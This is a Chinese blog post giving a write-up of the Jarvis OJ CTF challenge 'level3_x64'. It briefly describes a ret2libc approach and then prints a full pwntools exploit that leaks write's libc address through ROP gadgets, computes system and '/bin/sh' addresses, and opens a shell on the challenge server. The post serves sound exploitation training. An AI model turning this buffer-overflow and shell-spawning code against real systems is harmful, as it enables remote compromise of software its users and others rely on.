美文网首页
Jarvis OJ---level3_x64

Jarvis OJ---level3_x64

作者: yahoo0o0 | 来源:发表于2017-09-24 16:42 被阅读0次

    与level2_x64类似,也是x64位的一个程序,但是程序之中并没有直接调用system函数,也没有bin/sh参数,只提供了一个libc库,所以是要让我们通过libc库泄露system函数的地址和binsh的地址,这里要注意的是依旧是寄存器的问题,所以我们要构建gadget,rop绕过,通过泄漏出system函数的地址,然后在bss段中写入binsh参数,调用system函数从而getshell

    from pwn import *
    from time import *
    p = remote('pwn2.jarvisoj.com',9883)
    
    write_plt = 0x04004B0
    write_got = 0x0600A58
    poprdiret = 0x04006b3 
    start = 0x04004F0
    poprsiret = 0x04006b1
    write_libc_address = 0x00000000000eb700  #readelf -a ./libc-2.19.so | grep " write@"
    bin_sh_libc_address = 0x17c8c3       #strings -a -t x libc-2.19.so | grep "/bin/sh"
    system_libc_address = 0x0000000000046590 #readelf -a ./libc-2.19.so | grep " system@"
    exit_libc_address = 0x000000000003c1e0   #readelf -a ./libc-2.19.so | grep " exit@"
    
    
    
    payload1 = '\x00'*(0x80+8) + p64(poprdiret) + p64(1)+ p64(poprsiret)+p64(write_got) + p64(1) + p64(write_plt) +p64(start)
    p.recvuntil("Input:\n")
    p.sendline(payload1)
    leak = u64(p.recv(8))
    
    libc_base = leak - write_libc_address
    system = libc_base + system_libc_address
    binsh = libc_base + bin_sh_libc_address
    exit = libc_base + exit_libc_address
    
    payload = 'a'*(0x80+8) + p64(poprdiret) + p64(binsh) + p64(system) +p64(exit)
    p.sendline(payload)
    p.interactive()
    

    相关文章

      网友评论

          本文标题:Jarvis OJ---level3_x64

          本文链接:https://www.haomeiwen.com/subject/fgetextx.html